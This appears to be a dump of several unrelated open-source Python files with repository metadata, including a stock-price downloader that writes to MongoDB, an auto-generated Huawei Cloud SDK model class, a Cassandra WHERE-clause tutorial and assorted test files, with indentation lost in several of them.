df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNone(code, starts='2001-01-01', index=False):
try:
df = ts.get_k_data(code, start=starts, autype=None, index=index)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def saveDB(data: pd.DataFrame, code, handler=None):
def callback(result):
# handler.send_message(handler.project_name, result, self._date + '_' + result['_id'])
pass
re = util.updateMongoDB(data, util.genKeyCodeFunc('date'), const.KData.DB_NAME,
const.KData.COLLECTION_D_HEAD + code, True, callback)
# util.everydayChange(re, 'gpfh')
# forward-adjusted (qfq) price history
def RunOne(code, force=False):
#dblist = MongoClient.list_database_names()
client = MongoClient()
db = client['stock_all_kdata']
    collection_list = db.list_collection_names()
    if not force and code in collection_list:
        print("exist {}".format(code))
    else:
        # when forcing an update, drop the existing data first
        if force and code in collection_list:
            db.drop_collection(code)
        re = getKData(code)
        saveDB2(re, code)
def saveDB2(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata",
const.KData.COLLECTION_D_HEAD + code, True, callback)
# unadjusted (autype=None) price history
def RunOneNone(code):
client = MongoClient()
db = client['stock_all_kdata_none']
collectionList = db.list_collection_names()
if code in collectionList:
print("exist {}".format(code))
else:
re = getKDataNone(code)
saveDB3(re, code)
# roughly the last month of data
def RunOneNoneRecent(code):
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=31)
#starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone(code, starts)
saveDB3(re, code)
def RunHS300IndexRecent():
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
# starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone('000300', starts, index=True)
saveDB3(re, '000300')
def RunHS300Index():
re = getKDataNone('000300', starts='2001-01-01', index=True)
saveDB3(re, '000300')
def saveDB3(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata_none",
const.KData.COLLECTION_D_HEAD + code, True,
callback)
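# Minimal invocation sketch (illustrative; assumes a local MongoDB on the
# default port and network access for tushare):
if __name__ == '__main__':
    RunOne('000001')             # full forward-adjusted history for one stock
    RunOneNoneRecent('000001')   # refresh ~1 month of unadjusted bars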
| [
"[email protected]"
]
| |
d6b66c5898c3f0ff071147ca16a962d71c7d3fe2 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-cae/huaweicloudsdkcae/v1/model/component_snapshot_context.py | 4520d2f8150fd8c09f48b38ca2704f273519d7c8 | [
"Apache-2.0"
]
| permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 20,094 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ComponentSnapshotContext:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'app_id': 'str',
'available_replica': 'int',
'build': 'str',
'build_id': 'str',
'build_log_id': 'str',
'env_id': 'str',
'id': 'str',
'image_url': 'str',
'job_id': 'str',
'log_group_id': 'str',
'log_stream_id': 'str',
'name': 'str',
'operation': 'str',
'operation_status': 'str',
'replica': 'int',
'resource_limit': 'str',
'runtime': 'str',
'source': 'str',
'status': 'str',
'version': 'str',
'created_at': 'str',
'updated_at': 'str'
}
attribute_map = {
'app_id': 'app_id',
'available_replica': 'available_replica',
'build': 'build',
'build_id': 'build_id',
'build_log_id': 'build_log_id',
'env_id': 'env_id',
'id': 'id',
'image_url': 'image_url',
'job_id': 'job_id',
'log_group_id': 'log_group_id',
'log_stream_id': 'log_stream_id',
'name': 'name',
'operation': 'operation',
'operation_status': 'operation_status',
'replica': 'replica',
'resource_limit': 'resource_limit',
'runtime': 'runtime',
'source': 'source',
'status': 'status',
'version': 'version',
'created_at': 'created_at',
'updated_at': 'updated_at'
}
def __init__(self, app_id=None, available_replica=None, build=None, build_id=None, build_log_id=None, env_id=None, id=None, image_url=None, job_id=None, log_group_id=None, log_stream_id=None, name=None, operation=None, operation_status=None, replica=None, resource_limit=None, runtime=None, source=None, status=None, version=None, created_at=None, updated_at=None):
"""ComponentSnapshotContext
The model defined in huaweicloud sdk
        :param app_id: Application ID.
        :type app_id: str
        :param available_replica: Number of available replicas.
        :type available_replica: int
        :param build: Component build information.
        :type build: str
        :param build_id: Build task ID.
        :type build_id: str
        :param build_log_id: Build log ID.
        :type build_log_id: str
        :param env_id: Environment ID.
        :type env_id: str
        :param id: Component ID.
        :type id: str
        :param image_url: Image URL.
        :type image_url: str
        :param job_id: Job ID.
        :type job_id: str
        :param log_group_id: ID of the LTS log group.
        :type log_group_id: str
        :param log_stream_id: ID of the LTS log stream.
        :type log_stream_id: str
        :param name: Component name.
        :type name: str
        :param operation: Component operation.
        :type operation: str
        :param operation_status: Status of the component operation.
        :type operation_status: str
        :param replica: Number of replicas.
        :type replica: int
        :param resource_limit: Component resource specification.
        :type resource_limit: str
        :param runtime: Language/runtime.
        :type runtime: str
        :param source: Component source information.
        :type source: str
        :param status: Component status.
        :type status: str
        :param version: Component version.
        :type version: str
        :param created_at: Creation time.
        :type created_at: str
        :param updated_at: Update time.
        :type updated_at: str
"""
self._app_id = None
self._available_replica = None
self._build = None
self._build_id = None
self._build_log_id = None
self._env_id = None
self._id = None
self._image_url = None
self._job_id = None
self._log_group_id = None
self._log_stream_id = None
self._name = None
self._operation = None
self._operation_status = None
self._replica = None
self._resource_limit = None
self._runtime = None
self._source = None
self._status = None
self._version = None
self._created_at = None
self._updated_at = None
self.discriminator = None
if app_id is not None:
self.app_id = app_id
if available_replica is not None:
self.available_replica = available_replica
if build is not None:
self.build = build
if build_id is not None:
self.build_id = build_id
if build_log_id is not None:
self.build_log_id = build_log_id
if env_id is not None:
self.env_id = env_id
if id is not None:
self.id = id
if image_url is not None:
self.image_url = image_url
if job_id is not None:
self.job_id = job_id
if log_group_id is not None:
self.log_group_id = log_group_id
if log_stream_id is not None:
self.log_stream_id = log_stream_id
if name is not None:
self.name = name
if operation is not None:
self.operation = operation
if operation_status is not None:
self.operation_status = operation_status
if replica is not None:
self.replica = replica
if resource_limit is not None:
self.resource_limit = resource_limit
if runtime is not None:
self.runtime = runtime
if source is not None:
self.source = source
if status is not None:
self.status = status
if version is not None:
self.version = version
if created_at is not None:
self.created_at = created_at
if updated_at is not None:
self.updated_at = updated_at
@property
def app_id(self):
"""Gets the app_id of this ComponentSnapshotContext.
        Application ID.
:return: The app_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._app_id
@app_id.setter
def app_id(self, app_id):
"""Sets the app_id of this ComponentSnapshotContext.
        Application ID.
:param app_id: The app_id of this ComponentSnapshotContext.
:type app_id: str
"""
self._app_id = app_id
@property
def available_replica(self):
"""Gets the available_replica of this ComponentSnapshotContext.
        Number of available replicas.
:return: The available_replica of this ComponentSnapshotContext.
:rtype: int
"""
return self._available_replica
@available_replica.setter
def available_replica(self, available_replica):
"""Sets the available_replica of this ComponentSnapshotContext.
        Number of available replicas.
:param available_replica: The available_replica of this ComponentSnapshotContext.
:type available_replica: int
"""
self._available_replica = available_replica
@property
def build(self):
"""Gets the build of this ComponentSnapshotContext.
        Component build information.
:return: The build of this ComponentSnapshotContext.
:rtype: str
"""
return self._build
@build.setter
def build(self, build):
"""Sets the build of this ComponentSnapshotContext.
        Component build information.
:param build: The build of this ComponentSnapshotContext.
:type build: str
"""
self._build = build
@property
def build_id(self):
"""Gets the build_id of this ComponentSnapshotContext.
        Build task ID.
:return: The build_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._build_id
@build_id.setter
def build_id(self, build_id):
"""Sets the build_id of this ComponentSnapshotContext.
        Build task ID.
:param build_id: The build_id of this ComponentSnapshotContext.
:type build_id: str
"""
self._build_id = build_id
@property
def build_log_id(self):
"""Gets the build_log_id of this ComponentSnapshotContext.
        Build log ID.
:return: The build_log_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._build_log_id
@build_log_id.setter
def build_log_id(self, build_log_id):
"""Sets the build_log_id of this ComponentSnapshotContext.
        Build log ID.
:param build_log_id: The build_log_id of this ComponentSnapshotContext.
:type build_log_id: str
"""
self._build_log_id = build_log_id
@property
def env_id(self):
"""Gets the env_id of this ComponentSnapshotContext.
        Environment ID.
:return: The env_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._env_id
@env_id.setter
def env_id(self, env_id):
"""Sets the env_id of this ComponentSnapshotContext.
        Environment ID.
:param env_id: The env_id of this ComponentSnapshotContext.
:type env_id: str
"""
self._env_id = env_id
@property
def id(self):
"""Gets the id of this ComponentSnapshotContext.
        Component ID.
:return: The id of this ComponentSnapshotContext.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this ComponentSnapshotContext.
        Component ID.
:param id: The id of this ComponentSnapshotContext.
:type id: str
"""
self._id = id
@property
def image_url(self):
"""Gets the image_url of this ComponentSnapshotContext.
        Image URL.
:return: The image_url of this ComponentSnapshotContext.
:rtype: str
"""
return self._image_url
@image_url.setter
def image_url(self, image_url):
"""Sets the image_url of this ComponentSnapshotContext.
        Image URL.
:param image_url: The image_url of this ComponentSnapshotContext.
:type image_url: str
"""
self._image_url = image_url
@property
def job_id(self):
"""Gets the job_id of this ComponentSnapshotContext.
        Job ID.
:return: The job_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""Sets the job_id of this ComponentSnapshotContext.
        Job ID.
:param job_id: The job_id of this ComponentSnapshotContext.
:type job_id: str
"""
self._job_id = job_id
@property
def log_group_id(self):
"""Gets the log_group_id of this ComponentSnapshotContext.
        ID of the LTS log group.
:return: The log_group_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._log_group_id
@log_group_id.setter
def log_group_id(self, log_group_id):
"""Sets the log_group_id of this ComponentSnapshotContext.
        ID of the LTS log group.
:param log_group_id: The log_group_id of this ComponentSnapshotContext.
:type log_group_id: str
"""
self._log_group_id = log_group_id
@property
def log_stream_id(self):
"""Gets the log_stream_id of this ComponentSnapshotContext.
        ID of the LTS log stream.
:return: The log_stream_id of this ComponentSnapshotContext.
:rtype: str
"""
return self._log_stream_id
@log_stream_id.setter
def log_stream_id(self, log_stream_id):
"""Sets the log_stream_id of this ComponentSnapshotContext.
        ID of the LTS log stream.
:param log_stream_id: The log_stream_id of this ComponentSnapshotContext.
:type log_stream_id: str
"""
self._log_stream_id = log_stream_id
@property
def name(self):
"""Gets the name of this ComponentSnapshotContext.
        Component name.
:return: The name of this ComponentSnapshotContext.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this ComponentSnapshotContext.
        Component name.
:param name: The name of this ComponentSnapshotContext.
:type name: str
"""
self._name = name
@property
def operation(self):
"""Gets the operation of this ComponentSnapshotContext.
        Component operation.
:return: The operation of this ComponentSnapshotContext.
:rtype: str
"""
return self._operation
@operation.setter
def operation(self, operation):
"""Sets the operation of this ComponentSnapshotContext.
        Component operation.
:param operation: The operation of this ComponentSnapshotContext.
:type operation: str
"""
self._operation = operation
@property
def operation_status(self):
"""Gets the operation_status of this ComponentSnapshotContext.
        Status of the component operation.
:return: The operation_status of this ComponentSnapshotContext.
:rtype: str
"""
return self._operation_status
@operation_status.setter
def operation_status(self, operation_status):
"""Sets the operation_status of this ComponentSnapshotContext.
        Status of the component operation.
:param operation_status: The operation_status of this ComponentSnapshotContext.
:type operation_status: str
"""
self._operation_status = operation_status
@property
def replica(self):
"""Gets the replica of this ComponentSnapshotContext.
        Number of replicas.
:return: The replica of this ComponentSnapshotContext.
:rtype: int
"""
return self._replica
@replica.setter
def replica(self, replica):
"""Sets the replica of this ComponentSnapshotContext.
        Number of replicas.
:param replica: The replica of this ComponentSnapshotContext.
:type replica: int
"""
self._replica = replica
@property
def resource_limit(self):
"""Gets the resource_limit of this ComponentSnapshotContext.
        Component resource specification.
:return: The resource_limit of this ComponentSnapshotContext.
:rtype: str
"""
return self._resource_limit
@resource_limit.setter
def resource_limit(self, resource_limit):
"""Sets the resource_limit of this ComponentSnapshotContext.
        Component resource specification.
:param resource_limit: The resource_limit of this ComponentSnapshotContext.
:type resource_limit: str
"""
self._resource_limit = resource_limit
@property
def runtime(self):
"""Gets the runtime of this ComponentSnapshotContext.
        Language/runtime.
:return: The runtime of this ComponentSnapshotContext.
:rtype: str
"""
return self._runtime
@runtime.setter
def runtime(self, runtime):
"""Sets the runtime of this ComponentSnapshotContext.
        Language/runtime.
:param runtime: The runtime of this ComponentSnapshotContext.
:type runtime: str
"""
self._runtime = runtime
@property
def source(self):
"""Gets the source of this ComponentSnapshotContext.
        Component source information.
:return: The source of this ComponentSnapshotContext.
:rtype: str
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this ComponentSnapshotContext.
        Component source information.
:param source: The source of this ComponentSnapshotContext.
:type source: str
"""
self._source = source
@property
def status(self):
"""Gets the status of this ComponentSnapshotContext.
        Component status.
:return: The status of this ComponentSnapshotContext.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this ComponentSnapshotContext.
        Component status.
:param status: The status of this ComponentSnapshotContext.
:type status: str
"""
self._status = status
@property
def version(self):
"""Gets the version of this ComponentSnapshotContext.
        Component version.
:return: The version of this ComponentSnapshotContext.
:rtype: str
"""
return self._version
@version.setter
def version(self, version):
"""Sets the version of this ComponentSnapshotContext.
        Component version.
:param version: The version of this ComponentSnapshotContext.
:type version: str
"""
self._version = version
@property
def created_at(self):
"""Gets the created_at of this ComponentSnapshotContext.
        Creation time.
:return: The created_at of this ComponentSnapshotContext.
:rtype: str
"""
return self._created_at
@created_at.setter
def created_at(self, created_at):
"""Sets the created_at of this ComponentSnapshotContext.
        Creation time.
:param created_at: The created_at of this ComponentSnapshotContext.
:type created_at: str
"""
self._created_at = created_at
@property
def updated_at(self):
"""Gets the updated_at of this ComponentSnapshotContext.
        Update time.
:return: The updated_at of this ComponentSnapshotContext.
:rtype: str
"""
return self._updated_at
@updated_at.setter
def updated_at(self, updated_at):
"""Sets the updated_at of this ComponentSnapshotContext.
        Update time.
:param updated_at: The updated_at of this ComponentSnapshotContext.
:type updated_at: str
"""
self._updated_at = updated_at
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ComponentSnapshotContext):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
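# Serialization sketch (illustrative; requires the huaweicloudsdkcore and
# simplejson packages imported above):
if __name__ == "__main__":
    snapshot = ComponentSnapshotContext(name="demo", replica=2, status="running")
    print(snapshot.to_str())   # JSON string of the model's fields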
| [
"[email protected]"
]
| |
4408f2da3cc0458926f976eb6d208f94a4dbb331 | 05a2097cbc167c0d8cfde5a039600c6994a34232 | /custom/penn_state/constants.py | 74aac3cb2025c0fd4a0abd1312f7931d10a6287f | []
| no_license | shashanks/commcare-hq | 9c641a4d830cd523410be150c2d341c4edbce38a | 44c2bd56bcb746f1f6c7b624ddefbe4215fc791c | refs/heads/master | 2020-12-11T06:12:36.705418 | 2013-12-17T08:35:23 | 2013-12-17T08:35:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 314 | py | DOMAIN = 'psu-legacy-together'
DAILY_DATA_XMLNS = 'http://openrosa.org/formdesigner/B6E92793-CB42-449C-ACE7-99B0E65FE3AE'
COACH_RESPONSE_XMLNS = 'http://openrosa.org/formdesigner/D42C8CAB-F17C-4E9C-921C-CA47E6AECE15'
WEEKLY_SCHEDULE_XMLNS = 'http://openrosa.org/formdesigner/F2F7A739-BDEF-4D14-B60F-371AFE901B71'
| [
"[email protected]"
]
| |
952498fe3ce65449fb818515ea9a956611e27c3a | 37f48a90a33015a6e51d8b4ad839f5741a0c320f | /NoSQL_Cassandra/4_where_clause.py | 68a612d995a381451d49b6fabe6b8caf595c9534 | []
| no_license | Hadryan/Data_Engineering | 90376170a9a6a9700d1a1f32ea4b6efe6cdcbd98 | f02db4f2ffb592277b44c2807884443c910725b1 | refs/heads/master | 2020-12-14T11:01:33.399933 | 2019-12-21T15:36:33 | 2019-12-21T15:36:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,248 | py | # Since NoSQL has no JOINs, where becomes imperative
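# Cassandra data modeling is query-first: with no JOINs available, each table
# is denormalized around the exact WHERE clauses it has to serve, so the
# schema below is derived directly from the queries listed further down.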
import cassandra
from cassandra.cluster import Cluster
print('create connection to database \n')
try:
cluster = Cluster(['127.0.0.1'])
session = cluster.connect()
except Exception as e:
print(e)
print('create keyspace/database \n')
try:
session.execute("""
CREATE KEYSPACE IF NOT EXISTS udacity
WITH REPLICATION = {'class':'SimpleStrategy', 'replication_factor': 1}""")
except Exception as e:
print(e)
# connect to key space
print('connect to key space \n')
try:
session.set_keyspace('udacity')
except Exception as e:
print(e)
# create the table with the target queries in mind : 3 queries
# query 1 = all albums in a given year
# query 2 = albums released in a given year by 'The Beatles'
# query 3 = city where year=1970 AND artist_name='The Beatles' AND album_name='Let It Be'
print('create table \n')
query = "CREATE TABLE IF NOT EXISTS songs_library "
query = query + \
'(year int, artist_name text, album_name text, city text, PRIMARY KEY (year, artist_name, album_name))'
try:
session.execute(query)
except Exception as e:
print(e)
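# In this schema, year is the partition key and artist_name/album_name are
# clustering columns: a WHERE clause must restrict year first, then the
# clustering columns left to right. For illustration only (not executed here),
# "SELECT * FROM songs_library WHERE album_name='Let It Be'" skips the
# partition key and would be rejected by Cassandra unless ALLOW FILTERING
# were appended.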
# Insert 5 rows
print('insert rows \n')
query = "INSERT INTO songs_library (year, artist_name, album_name, city)"
query = query + "values(%s, %s, %s, %s)"
try:
session.execute(query, (1970, "The Beatles", "Let It Be", 'Liverpool'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Beatles", "Rubber Soul", 'Oxford'))
except Exception as e:
print(e)
try:
session.execute(query, (1965, "The Who", "My Generation", 'London'))
except Exception as e:
print(e)
try:
session.execute(query, (1966, "The Monkees", "The Monkees", 'Los Angeles'))
except Exception as e:
print(e)
try:
session.execute(query, (1970, "The Carpenters",
"Close To You", 'San Diego'))
except Exception as e:
print(e)
# validate that data was inserted
print('query 1 = all albums in a given year (1970) \n')
query = "SELECT * FROM songs_library WHERE year=1970"
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 2 = album realeased by 'The Beatles' where year=1970 \n")
query = "SELECT * FROM songs_library WHERE year=1970 AND artist_name='The Beatles' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.year, row.artist_name, row.album_name, row.city)
print("\n query 3 = album released year=1970 AND artist_name='The Beatles' AND album_name='Let IT BE' \n ")
query = "SELECT city FROM songs_library WHERE year = 1970 AND artist_name = 'The Beatles' AND album_name = 'Let It Be' "
try:
rows = session.execute(query)
except Exception as e:
print(e)
for row in rows:
print(row.city)
# drop table
print("\n drop table \n")
query = "DROP TABLE songs_library"
try:
rows = session.execute(query)
except Exception as e:
print(e)
# close session & cluster connection
print('close session & connection \n')
session.shutdown()
cluster.shutdown()
| [
"[email protected]"
]
| |
4088843b646eab6f6b40d2158cddb8ac622154dd | f0acc407f95b758fa734f5ed5f6506a8b20d2706 | /tests/test_tutorial/test_options/test_name/test_tutorial004_an.py | 087b436d55d07adedb8c0365657f3f42ab29d946 | [
"MIT"
]
| permissive | shnups/typer | ede6d86c5b169e8caa7823b0552f8531ed041f84 | e0b207f3f577cb2e59fdd60da39686a2f5ed0e77 | refs/heads/master | 2023-08-31T01:54:21.168547 | 2023-08-01T09:36:09 | 2023-08-01T09:36:09 | 313,047,732 | 0 | 0 | MIT | 2020-11-15T14:22:06 | 2020-11-15T14:22:05 | null | UTF-8 | Python | false | false | 1,018 | py | import subprocess
import sys
import typer
from typer.testing import CliRunner
from docs_src.options.name import tutorial004_an as mod
runner = CliRunner()
app = typer.Typer()
app.command()(mod.main)
def test_option_help():
result = runner.invoke(app, ["--help"])
assert result.exit_code == 0
assert "-n" in result.output
assert "--user-name" in result.output
assert "TEXT" in result.output
assert "--name" not in result.output
def test_call():
result = runner.invoke(app, ["-n", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_call_long():
result = runner.invoke(app, ["--user-name", "Camila"])
assert result.exit_code == 0
assert "Hello Camila" in result.output
def test_script():
result = subprocess.run(
[sys.executable, "-m", "coverage", "run", mod.__file__, "--help"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding="utf-8",
)
assert "Usage" in result.stdout
| [
"[email protected]"
]
| |
177511eb917f0c04de3ac00852473301adffedd1 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Scraper/scrapy/tests/test_command_version.py | f8c4ac141c2766133ad886ccb9a77791d7dbb1dc | [
"BSD-3-Clause"
]
| permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:73dce6f404541d9151c420cb22ff641258ce3d66e825df13aa289ff4a5c1f1ad
size 1058
| [
"[email protected]"
]
| |
eb6a8f7da9c4bcaff2db10a52426f6a119af66c9 | a1c9c55e1520356113a320be18e8fcb31654a944 | /archive/0.9/generated/seaborn-violinplot-1.py | 87adeb3dba3ac608c3ceeb5db1a699327d0c16bb | []
| no_license | seaborn/seaborn.github.io | bac12a9255b41c7971e9e94ea393d372ef66ef62 | f70445bc3456f0216169806c2daf03452ca1eba4 | refs/heads/master | 2023-01-06T10:50:10.789810 | 2022-12-30T19:59:55 | 2022-12-30T19:59:55 | 70,731,605 | 16 | 5 | null | 2022-06-28T00:32:07 | 2016-10-12T18:56:12 | HTML | UTF-8 | Python | false | false | 123 | py | import seaborn as sns
sns.set(style="whitegrid")
tips = sns.load_dataset("tips")
ax = sns.violinplot(x=tips["total_bill"])
| [
"[email protected]"
]
| |
2e74d353ab354e12d997f17a482999f383cf75ab | 68c421b58f43c82ba1f7c5b95138f76094a44f8e | /telemetry_tempest_plugin/scenario/test_gnocchi.py | e283d2f288d9f71f0080f2164111e4f39526039b | [
"Apache-2.0"
]
| permissive | NeCTAR-RC/telemetry-tempest-plugin | 37c986541ccad951e2cd7db3394a76a58ea1ce14 | fc990c4ada71ca3c45df2d4733bb1fb4b7f7c9e5 | refs/heads/master | 2021-06-27T03:24:35.519246 | 2019-05-24T06:21:57 | 2019-05-24T06:47:41 | 194,606,282 | 0 | 0 | null | 2019-07-01T05:36:00 | 2019-07-01T05:36:00 | null | UTF-8 | Python | false | false | 1,659 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import os
from tempest import config
import tempest.test
from telemetry_tempest_plugin.scenario import utils
CONF = config.CONF
TEST_DIR = os.path.join(os.path.dirname(__file__), 'gnocchi_gabbits')
class GnocchiGabbiTest(tempest.test.BaseTestCase):
credentials = ['admin']
TIMEOUT_SCALING_FACTOR = 5
@classmethod
def skip_checks(cls):
super(GnocchiGabbiTest, cls).skip_checks()
if not CONF.service_available.gnocchi:
raise cls.skipException("Gnocchi support is required")
def _prep_test(self, filename):
token = self.os_admin.auth_provider.get_token()
url = self.os_admin.auth_provider.base_url(
{'service': CONF.metric.catalog_type,
'endpoint_type': CONF.metric.endpoint_type,
'region': CONF.identity.region})
os.environ.update({
"GNOCCHI_SERVICE_URL": url,
"GNOCCHI_SERVICE_TOKEN": token,
"GNOCCHI_AUTHORIZATION": "not used",
})
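# Assumption: the gabbi YAML files under gnocchi_gabbits/ read these
# environment variables to locate and authenticate against the Gnocchi API.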
utils.generate_tests(GnocchiGabbiTest, TEST_DIR)
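# generate_tests discovers each gabbit file in TEST_DIR and attaches a
# corresponding test method to GnocchiGabbiTest at import time.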
| [
"[email protected]"
]
| |
d35548b0e453cd2577815b23e395954965d3dc5b | 6584124fee86f79ce0c9402194d961395583d6c3 | /blog/migrations/0008_auto_20150603_0708.py | 3f31a14ba2dcb128cea981661d996c147b8152a8 | []
| no_license | janusnic/webman | fdcffb7ed2f36d0951fd18bbaa55d0626cd271e1 | 2e5eaadec64314fddc19f27d9313317f7a236b9e | refs/heads/master | 2018-12-28T18:21:00.291717 | 2015-06-05T11:49:00 | 2015-06-05T11:49:00 | 35,676,834 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import blog.models
class Migration(migrations.Migration):
dependencies = [
('blog', '0007_page'),
]
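# Creates the Slider/Slide pair: each Slide carries an image plus a foreign
# key (added below) tying it to its parent Slider.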
operations = [
migrations.CreateModel(
name='Slide',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Draft'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
('image', models.ImageField(max_length=1024, null=True, upload_to=blog.models.get_blog_file_name, blank=True)),
],
),
migrations.CreateModel(
name='Slider',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.CharField(default=b'0', max_length=1, choices=[(b'0', b'Draft'), (b'1', b'Published'), (b'2', b'Not Published')])),
('title', models.CharField(max_length=32)),
('description', models.TextField(null=True, blank=True)),
],
),
migrations.AddField(
model_name='slide',
name='related_slider',
field=models.ForeignKey(to='blog.Slider'),
),
]
| [
"[email protected]"
]
| |
6e62b6a94f556f56721f4c83e23b79e90a9d3e9e | 9d01e03d2e1ff388aad8331280892192e02c0f9d | /limix_genetics/test/test_mvnorm.py | 3fe54045b300c7d796064df3b8d5a0c6ef22f528 | [
"MIT"
]
| permissive | limix/limix-genetics | a1dd7e18f55ce62265ca3deaeac0b83ff71239d8 | 9c69a59a61e030243a9f865a7f7ae8842859eaee | refs/heads/master | 2021-01-20T11:00:16.974644 | 2017-02-14T13:26:48 | 2017-02-14T13:26:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 364 | py | from limix_genetics import mvn_ecdf, mvn_eicdf
from numpy.testing import assert_allclose
def test_mvnorm():
x = [1, 2]
mean = [1.0, -0.3]
cov = [[1.5, 0.2],
[0.2, 0.7]]
cdf = mvn_ecdf(x, mean, cov)
icdf = mvn_eicdf(cdf, mean, cov)
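# Round-trip property: mvn_eicdf inverts mvn_ecdf, so evaluating the CDF at
# the recovered point must reproduce the original probability.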
assert_allclose(cdf, 0.98032128770733662)
assert_allclose(cdf, mvn_ecdf(icdf, mean, cov))
| [
"[email protected]"
]
|